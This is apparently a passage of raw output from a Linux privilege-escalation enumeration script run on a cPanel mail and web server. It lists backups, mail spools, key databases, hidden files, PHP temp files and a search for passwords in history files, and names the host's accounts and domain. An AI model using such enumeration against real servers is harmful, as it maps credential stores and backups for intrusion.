ifcfg-ether drwxr-xr-x. 2 root root 6 Oct 31 2018 rh ╔══════════╣ Unexpected in root /vmware-tools-distrib /.autorelabel /razor-agent.log /quota.user /aquota.user /quota.group /aquota.group /.forward /scripts /backup ╔══════════╣ Modified interesting files in the last 5mins (limit 100) /etc/recent_recipient_mail_server_ips /tmp/phpPs9qCI /tmp/phpLE16lM /tmp/phpXWPD6I /tmp/php6srKsg /tmp/phpyLRMW8 /tmp/phpPjtE4e /var/log/sa/sa23 /var/log/exim_mainlog /var/log/cron /var/log/maillog /var/log/chkservd.log /var/log/zabbix/zabbix_agentd.log /var/log/messages /var/log/exim_rejectlog /var/spool/exim/db/retry /var/spool/exim/db/wait-dkim_remote_smtp /var/tmp/phpPs9qCI /var/tmp/phpLE16lM /var/tmp/phpXWPD6I /var/tmp/php6srKsg /var/tmp/phpyLRMW8 /var/tmp/phpPjtE4e /usr/tmpDSK logrotate 3.8.6 ╔══════════╣ Files inside /home/nobody (limit 20)  ╔══════════╣ Files inside others home (limit 20) /var/www/html/400.shtml /var/www/html/401.shtml /var/www/html/403.shtml /var/www/html/404.shtml /var/www/html/413.shtml /var/www/html/500.shtml /var/www/html/cp_errordocument.shtml 
/var/www/html/index.html /var/www/html/suspended.page/index.html /var/www/html/.well-known/pki-validation/51065C27A8C3FFD02217F83282EDE214.txt /var/www/html/.well-known/pki-validation/C5352B49F0027A4DEB6833D1F0AB9ECD.txt /var/www/html/.well-known/pki-validation/7F6BF68B9A61E06F127FA47C420F1AA3.txt /var/www/html/.well-known/pki-validation/0ACB14A369FB93863EC208B4914172AE.txt /var/www/html/.well-known/pki-validation/CD992C90A70B106A4C6C975109E26F24.txt /var/www/html/.well-known/pki-validation/F29E747DFD32220E94A41984A748B761.txt /var/www/html/.well-known/pki-validation/C36C8DD907A2A7AFB3C8F096217C19A0.txt /var/www/html/.well-known/pki-validation/E876F34D0778207D7ADD8F6EB19A5B97.txt /var/www/html/.well-known/pki-validation/B9E182CD5085D4C47EEC9E1F38DCB3B3.txt /var/www/html/.well-known/pki-validation/B5DE5306FAF688A71485F739351EDE6B.txt /var/www/html/.well-known/pki-validation/12E068CE2D3EEE3ACC7BDF72FC162710.txt grep: write error ╔══════════╣ Searching installed mail applications antivirus.exim dovecot dovecot-sysreport exim exim.conf exim.conf.dist exim.conf.local exim.conf.localopts exim.conf.mailman2.dist exim.conf.mailman2.exiscan.dist exim.crt exim.key exim.pl exim.pl.local sendmail ╔══════════╣ Mails (limit 50) 134372630 0 -rw-rw---- 1 nagios mail 0 Jun 19 2015 /var/mail/ctrl4c 134440004 0 -rw-rw---- 1 nagios mail 0 Aug 3 2015 /var/mail/nagios 134836318 0 -rw-rw---- 1 ctrlsadmin mail 0 Apr 18 2016 /var/mail/ctrlsadmin 134837634 0 -rw-rw---- 1 rpc mail 0 Aug 7 2017 /var/mail/rpc 134800565 0 -rw-rw---- 1 cloud4c mail 0 Feb 5 10:43 /var/mail/cloud4c 134372630 0 -rw-rw---- 1 nagios mail 0 Jun 19 2015 /var/spool/mail/ctrl4c 134440004 0 -rw-rw---- 1 nagios mail 0 Aug 3 2015 /var/spool/mail/nagios 134836318 0 -rw-rw---- 1 ctrlsadmin mail 0 Apr 18 2016 /var/spool/mail/ctrlsadmin 134837634 0 -rw-rw---- 1 rpc mail 0 Aug 7 2017 /var/spool/mail/rpc 134800565 0 -rw-rw---- 1 cloud4c mail 0 Feb 5 10:43 /var/spool/mail/cloud4c ╔══════════╣ Backup folders drwx------. 
2 root root 19 Jun 2 2020 /etc/lvm/backup drwx--x--x 3 root root 38 Jul 28 2022 /usr/bin/backup drwxr-xr-x. 2 root root 26 Aug 6 2019 /usr/share/doc/subversion-1.7.14/backup total 12 -rwxr-xr-x 1 root root 11444 Apr 11 2018 hot-backup.py drwxr-xr-x 15 root root 4096 Jan 22 2021 /usr/share/mysql-test/suite/ndb/backups total 4 drwxr-xr-x 2 root root 4096 Feb 10 2021 50 drwxr-xr-x 2 root root 138 Feb 10 2021 51 drwxr-xr-x 2 root root 138 Feb 10 2021 51_d2_be drwxr-xr-x 2 root root 138 Feb 10 2021 51_d2_le drwxr-xr-x 2 root root 138 Feb 10 2021 51_data_be drwxr-xr-x 2 root root 138 Feb 10 2021 51_data_le drwxr-xr-x 2 root root 138 Feb 10 2021 51_dd drwxr-xr-x 2 root root 138 Feb 10 2021 51_undolog_be drwxr-xr-x 2 root root 138 Feb 10 2021 51_undolog_le drwxr-xr-x 2 root root 138 Feb 10 2021 before_native_default drwxr-xr-x 2 root root 27 Feb 10 2021 bug54613 drwxr-xr-x 2 root root 27 Feb 10 2021 hashmap drwxr-xr-x 2 root root 72 Feb 10 2021 packed ╔══════════╣ Backup files (limited 100) -rw-r--r-- 1 root root 255 May 23 17:21 /run/blkid/blkid.tab.old -rw-r--r-- 1 root root 1728 Feb 3 2017 /etc/nsswitch.conf.bak -rw-r--r-- 1 root root 138 Sep 15 2017 /etc/cpbackup-exclude.conf -rw-r--r-- 1 root root 38741 May 22 03:01 /var/log/dmesg.old -rwxr-xr-x 1 root root 18816 Sep 11 2014 /usr/bin/db47_hotbackup -rw-r--r-- 1 root root 8085 Oct 24 2016 /usr/lib/modules/3.10.0-327.36.3.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 8085 May 25 2017 /usr/lib/modules/3.10.0-514.21.1.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 8085 Jul 4 2017 /usr/lib/modules/3.10.0-514.26.2.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko -rw-r--r-- 1 root root 2288 Jul 29 2019 /usr/lib/modules/3.10.0-957.27.2.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz -rw-r--r-- 1 root root 354 Dec 8 2018 /usr/lib/vmware-tools/configurator/pam.d/vmtoolsd.old.1 -rwxr-xr-x 1 root root 11444 Apr 11 2018 
/usr/share/doc/subversion-1.7.14/backup/hot-backup.py -rw-r--r--. 1 root root 41508 Mar 10 2006 /usr/share/doc/pinfo-0.6.10/ChangeLog.old -rw-r--r--. 1 root root 10357 Sep 12 2013 /usr/share/doc/bash-completion-2.1/CHANGES.package.old -rw-r--r-- 1 root root 475 Aug 24 2018 /usr/share/doc/initscripts-9.49.46/examples/networking/ifcfg-bond-activebackup-arpmon -rw-r--r-- 1 root root 393 Aug 24 2018 /usr/share/doc/initscripts-9.49.46/examples/networking/ifcfg-bond-activebackup-miimon -rw-r--r-- 1 root root 305 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_arp_ping_1.conf -rw-r--r-- 1 root root 465 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_arp_ping_2.conf -rw-r--r-- 1 root root 194 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_1.conf -rw-r--r-- 1 root root 212 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_2.conf -rw-r--r-- 1 root root 241 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_3.conf -rw-r--r-- 1 root root 447 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_multi_lw_1.conf -rw-r--r-- 1 root root 285 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_nsna_ping_1.conf -rw-r--r-- 1 root root 318 Mar 17 2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_tipc.conf -rw-r--r-- 1 root root 1014 May 23 2015 /usr/share/augeas/lenses/dist/backuppchosts.aug -rw-r--r-- 1 root root 43 Aug 13 2024 /usr/share/man/man1/doveadm-backup.1.gz -rw-r--r-- 1 root root 2761 Apr 11 2018 /usr/share/man/man1/db_hotbackup.1.gz -r--r--r-- 1 root root 2796 Jul 3 2019 /usr/share/man/man8/vgcfgbackup.8.gz -rw-r--r-- 1 root root 405 Jan 5 2021 /usr/share/mysql-test/include/ndb_backup.inc -rw-r--r-- 1 root root 930 Jan 5 2021 /usr/share/mysql-test/include/ndb_backup_id.inc -rw-r--r-- 1 root root 459 Jan 5 2021 /usr/share/mysql-test/include/ndb_backup_print.inc -rw-r--r-- 1 root root 4396 Jan 5 2021 
/usr/share/mysql-test/r/backup.result -rw-r--r-- 1 root root 1802 Jan 5 2021 /usr/share/mysql-test/suite/ndb/r/ndb_alter_table_backup.result -rw-r--r-- 1 root root 1563 Jan 5 2021 /usr/share/mysql-test/suite/ndb/t/ndb_alter_table_backup.test -rw-r--r-- 1 root root 1603 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/r/ndb_backup_print.result -rw-r--r-- 1 root root 24262 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/r/ndb_dd_backuprestore.result -rw-r--r-- 1 root root 1465 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/t/ndb_backup_print.test -rw-r--r-- 1 root root 9974 Jan 5 2021 /usr/share/mysql-test/suite/ndb_team/t/ndb_dd_backuprestore.test -rw-r--r-- 1 root root 603 Jun 10 2013 /usr/local/src/csf/cpanel/csf.conf.old -rw-r--r-- 1 501 501 5671 Jun 27 2018 /usr/local/src/Python-3.7.0/Lib/sqlite3/test/backup.py -rw-r--r-- 1 root root 5671 Jul 3 2019 /usr/local/python3.7.old/lib/python3.7/sqlite3/test/backup.py -rw-r--r-- 1 root root 5671 Jul 3 2019 /usr/local/python3.7/lib/python3.7/sqlite3/test/backup.py -rw-r--r-- 1 root root 5671 Jul 3 2019 /usr/local/python3.6/lib/python3.7/sqlite3/test/backup.py -rw-r--r-- 1 root root 0 Jun 20 2017 /usr/src/kernels/3.10.0-514.21.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Jul 4 2017 /usr/src/kernels/3.10.0-514.26.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Sep 13 2017 /usr/src/kernels/3.10.0-693.2.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Oct 21 2017 /usr/src/kernels/3.10.0-693.5.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 root root 0 Jul 29 2019 /usr/src/kernels/3.10.0-957.27.2.el7.x86_64/include/config/net/team/mode/activebackup.h -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 /opt/backup-7.4.2024_17-59-16_miisky.tar.gz -rw-r--r-- 1 miisky miisky 13 Jul 4 2024 /opt/backup-7.4.2024_17-59-16_miisky -rwxr-xr-x. 
1 root root 26440 Aug 23 2014 /vmware-tools-distrib/lib/plugins64/vmsvc/libvmbackup.so -rwxr-xr-x. 1 root root 21700 Aug 23 2014 /vmware-tools-distrib/lib/plugins32/vmsvc/libvmbackup.so ╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100) Found /etc/aliases.db: Berkeley DB (Hash, version 9, native byte-order) Found /etc/openldap/certs/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/openldap/certs/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/openldap/certs/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/cert8.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/cert9.db: SQLite 3.x database Found /etc/pki/nssdb/key3.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /etc/pki/nssdb/key4.db: SQLite 3.x database Found /etc/pki/nssdb/secmod.db: Berkeley DB 1.85 (Hash, version 2, native byte-order) Found /var/lib/yum/history/history-2015-06-17.sqlite: regular file, no read permission Found /var/named/miisky.com.db: regular file, no read permission  -> Extracting tables from /etc/pki/nssdb/cert9.db (limit 20)  -> Extracting tables from /etc/pki/nssdb/key4.db (limit 20)  ╔══════════╣ Web files?(output limit) /var/www/: total 8.0K drwxr-xr-x. 4 root root 31 Jul 2 2019 . drwxr-xr-x. 24 root root 4.0K May 1 22:25 .. drwxr-xr-x. 2 root root 6 Jul 2 2019 cgi-bin drwxr-xr-x. 4 root root 4.0K Jul 2 2019 html /var/www/cgi-bin: total 0 drwxr-xr-x. 2 root root 6 Jul 2 2019 . 
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70) -rw-r--r-- 1 root root 171 Jul 29 2019 /boot/.vmlinuz-3.10.0-957.27.2.el7.x86_64.hmac -rw-r--r-- 1 root root 171 Jul 4 2017 /boot/.vmlinuz-3.10.0-514.26.2.el7.x86_64.hmac -rw-r--r-- 1 root root 171 Oct 24 2016 /boot/.vmlinuz-3.10.0-327.36.3.el7.x86_64.hmac -rw-r--r-- 1 root root 171 May 25 2017 /boot/.vmlinuz-3.10.0-514.21.1.el7.x86_64.hmac -rw-r--r-- 1 root root 0 May 23 03:01 /run/initramfs/.need_shutdown -rw-r--r-- 1 root root 129 Jul 29 2019 /etc/selinux/targeted/.policy.sha512 -rw-r--r-- 1 root root 18 Oct 30 2018 /etc/skel/.bash_logout -rw-r--r-- 1 root root 658 Oct 30 2018 /etc/skel/.zshrc -rw-------. 1 root root 0 Jun 17 2015 /etc/.pwd.lock -rw-r--r-- 1 root root 163 May 22 03:01 /etc/.updated -rw-r--r-- 1 root root 0 Jan 17 2022 /etc/.whostmgrft -rw-r--r--. 1 root root 0 Jun 17 2015 /var/lib/rpm/.rpm.lock -rw-r--r--. 1 root root 8267 Jun 10 2014 /var/lib/pear/.filemap -rw-r--r--. 
1 root root 0 Jun 10 2014 /var/lib/pear/.lock -rw-r--r-- 1 root root 192 May 13 2018 /var/lib/spamassassin/compiled/5.024/3.004001/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Nov 7 2018 /var/lib/spamassassin/compiled/5.026/3.004001/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Mar 3 2019 /var/lib/spamassassin/compiled/5.026/3.004002/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Dec 17 2019 /var/lib/spamassassin/compiled/5.028/3.004002/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Mar 2 2020 /var/lib/spamassassin/compiled/5.028/3.004003/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Mar 10 2021 /var/lib/spamassassin/compiled/5.030/3.004004/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 192 Feb 22 2023 /var/lib/spamassassin/compiled/5.032/3.004004/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 210 Feb 22 2023 /var/lib/spamassassin/compiled/5.032/3.004004/auto/Mail/SpamAssassin/CompiledRegexps/body_neg2000/.packlist -rw-r--r-- 1 root root 192 May 22 22:27 /var/lib/spamassassin/compiled/5.036/3.004006/auto/Mail/SpamAssassin/CompiledRegexps/body_0/.packlist -rw-r--r-- 1 root root 210 May 22 22:28 /var/lib/spamassassin/compiled/5.036/3.004006/auto/Mail/SpamAssassin/CompiledRegexps/body_neg2000/.packlist -rw-r--r-- 1 root root 163 May 22 03:01 /var/.updated -rw-r--r-- 1 root root 65 Aug 2 2017 /usr/lib/.libgcrypt.so.11.hmac -rw-r--r-- 1 root root 2151 May 31 2019 /usr/lib64/perl5/auto/CPAN/.packlist -rw-r--r-- 1 root root 65 Aug 2 2017 /usr/lib64/.libgcrypt.so.11.hmac -rw-r--r-- 1 root root 65 Nov 6 2016 /usr/lib64/.libhogweed.so.2.5.hmac -rw-r--r-- 1 root root 65 Nov 6 2016 /usr/lib64/.libnettle.so.4.7.hmac -rw-r--r-- 1 root root 65 Mar 14 2019 /usr/lib64/.libgnutls.so.28.43.3.hmac -rw-r--r-- 1 root root 65 Mar 12 2019 
/usr/lib64/.libcrypto.so.1.0.2k.hmac -rw-r--r-- 1 root root 65 Mar 12 2019 /usr/lib64/.libssl.so.1.0.2k.hmac -rw-r--r-- 1 root root 230 Jul 3 2019 /usr/share/doc/python-docs-2.7.5/html/.buildinfo -rw-r--r-- 1 root root 40 Oct 30 2018 /usr/share/man/man1/..1.gz -rw-r--r-- 1 root root 42 Jan 29 2019 /usr/share/man/man5/.k5identity.5.gz -rw-r--r-- 1 root root 2328 Apr 23 2013 /usr/share/kde4/apps/kdm/themes/CentOS7/.colorlsCZ1 -rw-r--r-- 1 root root 65 Jan 5 2021 /usr/share/mysql-test/std_data/.mylogin.cnf -rw-r--r-- 1 root root 137701 Jun 20 2017 /usr/src/kernels/3.10.0-514.21.2.el7.x86_64/.config -rw-r--r-- 1 root root 137701 Jul 4 2017 /usr/src/kernels/3.10.0-514.26.2.el7.x86_64/.config -rw-r--r-- 1 root root 140898 Sep 13 2017 /usr/src/kernels/3.10.0-693.2.2.el7.x86_64/.config -rw-r--r-- 1 root root 140898 Oct 21 2017 /usr/src/kernels/3.10.0-693.5.2.el7.x86_64/.config -rw-r--r-- 1 root root 151945 Jul 29 2019 /usr/src/kernels/3.10.0-957.27.2.el7.x86_64/.config -rw-r--r-- 1 root root 6961 Jul 24 2019 /opt/cpanel/ea-php56/root/usr/var/lib/pear/.filemap -rw-r--r-- 1 root root 0 Jul 24 2019 /opt/cpanel/ea-php56/root/usr/var/lib/pear/.lock -rw-r--r-- 1 root root 6961 Feb 27 2021 /opt/cpanel/ea-php70/root/usr/var/lib/pear/.filemap -rw-r--r-- 1 root root 0 Feb 27 2021 /opt/cpanel/ea-php70/root/usr/var/lib/pear/.lock -rw-r--r-- 1 root root 6961 Jul 24 2019 /opt/cpanel/ea-php55/root/usr/var/lib/pear/.filemap -rw-r--r-- 1 root root 0 Jul 24 2019 /opt/cpanel/ea-php55/root/usr/var/lib/pear/.lock -rw-r--r-- 1 root root 0 Jun 17 2015 /.autorelabel -rw------- 1 root root 26 Jan 11 2018 /.forward ╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70) grep: write error -rw------- 1 nobody nobody 3586011 May 19 09:39 /tmp/phpbs6cwD -rw------- 1 nobody nobody 2709780 May 16 20:50 /tmp/phpBUUXCY -rw------- 1 nobody nobody 1243917 May 21 17:51 /tmp/phpQ8WGxf -rw------- 1 nobody nobody 1945220 May 15 16:53 
/tmp/phpifKjbd -rw------- 1 nobody nobody 114344 May 22 12:52 /tmp/php6mk5mU -rw------- 1 nobody nobody 1929863 May 21 15:24 /tmp/phpaYQxk2 -rw------- 1 nobody nobody 158689 May 20 15:29 /tmp/php4t3v0x -rw------- 1 nobody nobody 8057306 May 19 09:01 /tmp/phpygScOr -rw------- 1 nobody nobody 261069 May 20 12:50 /tmp/phpPjBiHL -rw------- 1 nobody nobody 701303 May 16 07:45 /tmp/phpLyci6a -rw------- 1 nobody nobody 265327 May 16 03:15 /tmp/phphJfJWk -rw------- 1 nobody nobody 143332 May 15 19:59 /tmp/php8ByYqS -rw------- 1 nobody nobody 947015 May 16 14:53 /tmp/phpD6i0Eh -rw------- 1 nobody nobody 1929863 May 23 10:44 /tmp/phpKPnnv2 -rw------- 1 nobody nobody 716660 May 13 08:03 /tmp/php8NO83J -rw------- 1 nobody nobody 1914506 May 15 20:29 /tmp/phpBokGzq -rw------- 1 nobody nobody 947015 May 16 14:53 /tmp/phpEtsGyw -rw------- 1 nobody nobody 291783 May 16 12:44 /tmp/phpusLVHI -rw------- 1 nobody nobody 670589 May 20 22:49 /tmp/php6uDGo9 -rw------- 1 nobody nobody 470948 May 19 11:11 /tmp/phpWXvngq -rw------- 1 nobody nobody 3439968 May 21 12:23 /tmp/php92h2q8 -rw------- 1 nobody nobody 1699508 May 19 21:57 /tmp/phpVcyIo2 -rw------- 1 nobody nobody 2866640 May 18 13:18 /tmp/phpfg4nD6 -rw------- 1 nobody nobody 5090400 May 14 10:17 /tmp/phpUjyGRK -rw------- 1 nobody nobody 5354474 May 21 18:16 /tmp/phpActg2M -rw------- 1 nobody nobody 112618 May 16 12:44 /tmp/php6Y0DQl -rw------- 1 nobody nobody 1305345 May 15 19:16 /tmp/phpgGZhRl -rw------- 1 nobody nobody 1929863 May 13 19:09 /tmp/phpJBKvzt -rw------- 1 nobody nobody 10401808 May 15 15:48 /tmp/phpb3y2hn -rw------- 1 nobody nobody 1914506 May 21 02:57 /tmp/phpx9a5UM -rw------- 1 nobody nobody 685946 May 18 21:48 /tmp/php7tSgrp -rw------- 1 nobody nobody 491424 May 14 10:20 /tmp/phpPSlmkO -rw------- 1 nobody nobody 2226765 May 20 22:49 /tmp/phpL19ioG -rw------- 1 nobody nobody 143332 May 18 12:32 /tmp/phpKokF2N -rw------- 1 nobody nobody 2781887 May 15 20:28 /tmp/phpsK5Go1 -rw------- 1 nobody nobody 962372 May 15 19:16 
/tmp/phpHYi5Cj -rw------- 1 nobody nobody 1699508 May 16 14:54 /tmp/phpVAIOjd -rw------- 1 nobody nobody 3240327 May 22 12:23 /tmp/phpDEzxDi -rw------- 1 nobody nobody 5682250 May 13 12:23 /tmp/phpID43YG -rw------- 1 nobody nobody 491424 May 23 17:18 /tmp/phpPs9qCI -rw------- 1 nobody nobody 1929863 May 23 15:53 /tmp/phpRYtbld -rw------- 1 nobody nobody 1714865 May 14 23:22 /tmp/phppeYZdC -rw------- 1 nobody nobody 194522 May 13 10:32 /tmp/phpdCiH2W -rw------- 1 nobody nobody 1044276 May 18 01:03 /tmp/phptnUG04 -rw------- 1 nobody nobody 2093671 May 23 15:53 /tmp/phpzGa1FU -rw------- 1 nobody nobody 2474746 May 18 13:20 /tmp/phpooLbta -rw------- 1 nobody nobody 3583300 May 22 11:49 /tmp/phpcj1gTr -rw------- 1 nobody nobody 3450262 May 16 02:44 /tmp/phpxii165 -rw------- 1 nobody nobody 4028653 May 14 10:20 /tmp/php15H0ay -rw------- 1 nobody nobody 2418321 May 20 12:01 /tmp/phpKGqkey -rw------- 1 nobody nobody 322497 May 14 18:15 /tmp/phpdqlezJ -rw------- 1 nobody nobody 2702832 May 14 09:25 /tmp/phpSkMp9B -rw------- 1 nobody nobody 97261 May 23 17:18 /tmp/phpLE16lM -rw------- 1 nobody nobody 1504986 May 21 22:41 /tmp/php5M1hCR -rw------- 1 nobody nobody 5058750 May 19 12:32 /tmp/phpNxYqJX -rw------- 1 nobody nobody 179165 May 21 22:41 /tmp/phpdmun3N -rw------- 1 nobody nobody 6091610 May 17 10:27 /tmp/phpq0INqh -rw------- 1 nobody nobody 2843892 May 14 19:17 /tmp/phpLoiBh3 -rw------- 1 nobody nobody 4697323 May 19 08:47 /tmp/phpKs2y6X -rw------- 1 nobody nobody 1341178 May 18 21:48 /tmp/phpiBKk5F -rw------- 1 nobody nobody 998205 May 21 02:57 /tmp/phpj7N8bP -rw------- 1 nobody nobody 2503191 May 15 14:28 /tmp/phpUoYoOU -rw------- 1 nobody nobody 3194256 May 14 22:07 /tmp/phpjIGUSg -rw------- 1 nobody nobody 737136 May 14 19:25 /tmp/phpMbNgeQ -rw------- 1 nobody nobody 962372 May 14 23:21 /tmp/phpnBOQWL -rw------- 1 nobody nobody 849754 May 15 20:26 /tmp/php3IetBn -rw------- 1 nobody nobody 982848 May 21 12:07 /tmp/phplpD14j -rw------- 1 nobody nobody 112618 May 22 
12:52 /tmp/phpxu3nYs -rw------- 1 nobody nobody 205337 May 15 14:59 /tmp/phpMl4Zs1 ╔══════════╣ Searching passwords in history files /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.withdraw() /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/python3.6/lib/python3.7/idlelib/idle_test/test_history.py: del cls.root /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.withdraw() /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/python3.7.old/lib/python3.7/idlelib/idle_test/test_history.py: del cls.root /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.withdraw() 
/usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: @classmethod /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/python3.7/lib/python3.7/idlelib/idle_test/test_history.py: del cls.root /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: @classmethod /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: @classmethod /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: cls.root = tk.Tk() /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: cls.root.withdraw() /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: self.text = text = TextWrapper(self.root) /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: @classmethod /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: cls.root.destroy() /usr/local/src/Python-3.7.0/Lib/idlelib/idle_test/test_history.py: del cls.root /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_stages_history_long.result:ERROR 42000: Access denied for user 
'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_statements_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history_long.result:ERROR 42000: Access denied for user 'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/ddl_events_waits_history_long.result:ERROR 42000: Access denied for user 
'root'@'localhost' to database 'performance_schema' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: INSERT command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: UPDATE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: DELETE command denied to user 'root'@'localhost' for table 'events_stages_history' /usr/share/mysql-test/suite/perfschema/r/dml_events_stages_history.result:ERROR 42000: SELECT, LOCK TABLES command denied to user 'root'@'localhost' for table 'events_stages_history' 